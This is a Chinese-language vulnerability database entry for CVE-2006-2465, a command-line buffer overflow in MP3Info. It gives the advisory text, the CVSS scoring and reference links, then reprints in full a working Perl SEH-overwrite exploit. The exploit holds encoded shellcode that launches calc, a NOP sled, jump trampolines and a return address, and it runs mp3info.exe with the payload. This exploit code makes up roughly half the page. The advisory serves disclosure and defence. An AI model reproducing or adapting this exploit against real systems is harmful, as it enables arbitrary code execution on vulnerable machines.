CVE-2006-2465
CVSS5.1
发布时间 :2006-05-19 06:02:00
修订时间 :2014-05-30 22:22:38
NMCOP    

[原文]Buffer overflow in MP3Info 0.8.4 allows attackers to execute arbitrary code via a long command line argument. NOTE: if mp3info is not installed setuid or setgid in any reasonable context, then this issue might not be a vulnerability.


[CNNVD]MP3Info 未明缓冲区溢出漏洞(CNNVD-200605-370)

        MP3Info 0.8.4 中存在缓冲区溢出。攻击者可以通过一个长命令行自变量执行任意代码。注: 如果mp3info在合理的上下文中未安装setuid或setgid,则此问题可能不是漏洞。

- CVSS (基础分值)

CVSS分值: 5.1 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: HIGH [漏洞利用存在特定的访问条件]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2465
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-2465
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200605-370
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/18016
(UNKNOWN)  BID  18016
http://www.securiteam.com/exploits/5GP0E15IKO.html
(UNKNOWN)  MISC  http://www.securiteam.com/exploits/5GP0E15IKO.html
http://www.exploit-db.com/exploits/32358
(UNKNOWN)  EXPLOIT-DB  32358
http://securitytracker.com/id?1016108
(UNKNOWN)  SECTRACK  1016108
http://packetstormsecurity.com/files/125786/MP3Info-0.8.5-SEH-Buffer-Overflow.html
(UNKNOWN)  MISC  http://packetstormsecurity.com/files/125786/MP3Info-0.8.5-SEH-Buffer-Overflow.html
http://packetstormsecurity.com/files/124955/Mp3info-Stack-Buffer-Overflow.html
(UNKNOWN)  MISC  http://packetstormsecurity.com/files/124955/Mp3info-Stack-Buffer-Overflow.html
http://osvdb.org/show/osvdb/30945
(UNKNOWN)  OSVDB  30945

- 漏洞信息

MP3Info 未明缓冲区溢出漏洞
中危 缓冲区溢出
2006-05-19 00:00:00 2006-05-19 00:00:00
远程  
        MP3Info 0.8.4 中存在缓冲区溢出。攻击者可以通过一个长命令行自变量执行任意代码。注: 如果mp3info在合理的上下文中未安装setuid或setgid,则此问题可能不是漏洞。

- 公告与补丁

        暂无数据

- 漏洞信息 (F125786)

MP3Info 0.8.5 SEH Buffer Overflow (PacketStormID:F125786)
2014-03-19 00:00:00
Ayman Sagy  
exploit,overflow
CVE-2006-2465,OSVDB-30945
[点击下载]

MP3Info version 0.8.5 SEH buffer overflow exploit.

# Exploit Title: mp3info SEH exploit
# Date: 18 March 2014
# Exploit Author: Ayman Sagy <aymansagy [at] gmail.com>
# Vendor Homepage: http://ibiblio.org/mp3info/
# Software Link: http://www.exploit-db.com/wp-content/themes/exploit/applications/cb7b619a10a40aaac2113b87bb2b2ea2-mp3info-0.8.5a.tgz
# Version: MP3Info 0.8.5
# Tested on: Windows 7 Ultimate 64 and 32 bit
# CVE : 2006-2465
# Original POC: http://www.exploit-db.com/exploits/31220/
#
# The process memory region starts with a null byte but exploitation is still possible because of
# the little endian architecture provided that the return address gets placed at the end of the buffer,
# this however confines us in the tiny 4-byte area after pop/pop/retn
# Using a couple of trampolines I jumped back to the beginning of the buffer which is 533 bytes, enough to fit a calc payload
#
# run in the same directory of MP3Info, the exploit will launch mp3info with the payload as argument: perl mp3infosploit.pl
 
 
 
# mangled chars: F4->34 F3->33
# msfpayload windows/exec cmd=calc R | msfencode -b '\x00\0d\0a\x09' -t perl
$shellcode =
"\xdb\xd4\xba\x2b\xc5\x7d\xb7\xd9\x74\x24\xf4\x58\x29\xc9" .
"\xb1\x32\x31\x50\x17\x83\xe8\xfc\x03\x7b\xd6\x9f\x42\x87" .
"\x30\xd6\xad\x77\xc1\x89\x24\x92\xf0\x9b\x53\xd7\xa1\x2b" .
"\x17\xb5\x49\xc7\x75\x2d\xd9\xa5\x51\x42\x6a\x03\x84\x6d" .
"\x6b\xa5\x08\x21\xaf\xa7\xf4\x3b\xfc\x07\xc4\xf4\xf1\x46" .
"\x01\xe8\xfa\x1b\xda\x67\xa8\x8b\x6f\x35\x71\xad\xbf\x32" .
"\xc9\xd5\xba\x84\xbe\x6f\xc4\xd4\x6f\xfb\x8e\xcc\x04\xa3" .
"\x2e\xed\xc9\xb7\x13\xa4\x66\x03\xe7\x37\xaf\x5d\x08\x06" .
"\x8f\x32\x37\xa7\x02\x4a\x7f\x0f\xfd\x39\x8b\x6c\x80\x39" .
"\x48\x0f\x5e\xcf\x4d\xb7\x15\x77\xb6\x46\xf9\xee\x3d\x44" .
"\xb6\x65\x19\x48\x49\xa9\x11\x74\xc2\x4c\xf6\xfd\x90\x6a" .
"\xd2\xa6\x43\x12\x43\x02\x25\x2b\x93\xea\x9a\x89\xdf\x18" .
"\xce\xa8\xbd\x76\x11\x38\xb8\x3f\x11\x42\xc3\x6f\x7a\x73" .
"\x48\xe0\xfd\x8c\x9b\x45\xf1\xc6\x86\xef\x9a\x8e\x52\xb2" .
"\xc6\x30\x89\xf0\xfe\xb2\x38\x88\x04\xaa\x48\x8d\x41\x6c" .
"\xa0\xff\xda\x19\xc6\xac\xdb\x0b\xa5\x33\x48\xd7\x2a";
 
 
$exploit = "\x90"x156 . $shellcode;
$exploit .= "\x41"x142;
 
                                     
$exploit .=                             # larger jump to beginning of buffer
            "\x58\x58\x58".             # 58 POP EAX x 3
            "\x80\xc4\x02".             # 80C4 02          ADD AH,2
            "\xFF\xE0";                 # FFE0             JMP EAX  
 
 
$exploit .= "\xEB\xEF\x90\x90"; # short jmp back to get some space
 
 
#print length($exploit);
#exit(0);
print "\n";
$seh = "\x46\x34\x40"; # 0x00403446  mp3info.exe             POP EBX
 
$exploit = $exploit . $seh;
 
system("mp3info.exe", $exploit);


    

- 漏洞信息

30945
MP3Info Command Line Argument Overflow
Input Manipulation
Loss of Integrity

- 漏洞描述

Unknown or Incomplete

- 时间线

2006-05-14 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站